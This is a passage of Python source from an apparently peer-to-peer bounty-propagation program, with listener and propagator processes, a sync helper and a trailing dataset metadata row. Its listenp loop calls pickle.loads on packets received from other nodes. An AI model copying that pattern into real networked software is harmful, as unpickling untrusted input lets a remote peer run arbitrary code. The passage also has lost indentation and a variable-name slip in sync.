safeprint("Failed: " + str(type(error)))
safeprint(error)
return False
def listenp(port, v):
"""BLOCKING function which should only be run in a daemon thread. Listens and responds to other nodes"""
import time
while v.value: # is True is implicit
safeprint("listenp-ing", verbosity=3)
try:
while propQueue.empty() and v.value:
time.sleep(0.01)
packet = propQueue.get()
safeprint("Received: " + str(packet), verbosity=3)
if packet[0] == incoming_bounty:
bounty = pickle.loads(packet[1])
if bounty.isValid():
from multiprocessing.pool import ThreadPool
ThreadPool().map(propagate, [(bounty, x) for x in peerlist[:]])
elif packet[0] == incoming_bounties:
for bounty in packet[1]:
if bounty.isValid():
from multiprocessing.pool import ThreadPool
ThreadPool().map(propagate, [(bounty, x) for x in peerlist[:]])
safeprint("Packet processed")
except Exception as error:
safeprint("Failed: " + str(type(error)))
safeprint(error)
def sync(items):
if items.get('config'):
from common import settings
settings.config = items.get('config')
if items.get('peerList'):
global peerlist
peerList = items.get('peerList')
if items.get('bountyList'):
from common import bounty
bounty.bountyList = items.get('bountyList')
if items.get('bountyLock'):
from common import bounty
bounty.bountyLock = items.get('bountyLock')
if items.get('propQueue'):
global propQueue
propQueue = items.get('propQueue')
class listener(multiprocessing.Process): # pragma: no cover
"""A class to deal with the listener method"""
def __init__(self, port, outbound, q, v, serv):
multiprocessing.Process.__init__(self)
self.outbound = outbound
self.port = port
self.q = q
self.v = v
self.serv = serv
def run(self):
safeprint("listener started")
sync(self.items)
listen(self.port, self.outbound, self.q, self.v, self.serv)
safeprint("listener stopped")
class propagator(multiprocessing.Process): # pragma: no cover
"""A class to deal with the listener method"""
def __init__(self, port, v):
multiprocessing.Process.__init__(self)
self.port = port
self.v = v
def run(self):
safeprint("propagator started")
sync(self.items)
listenp(self.port, self.v)
safeprint("propagator stopped")
| mit | -2,676,792,061,939,969,500 | 34.203501 | 150 | 0.599018 | false |
Subsets and Splits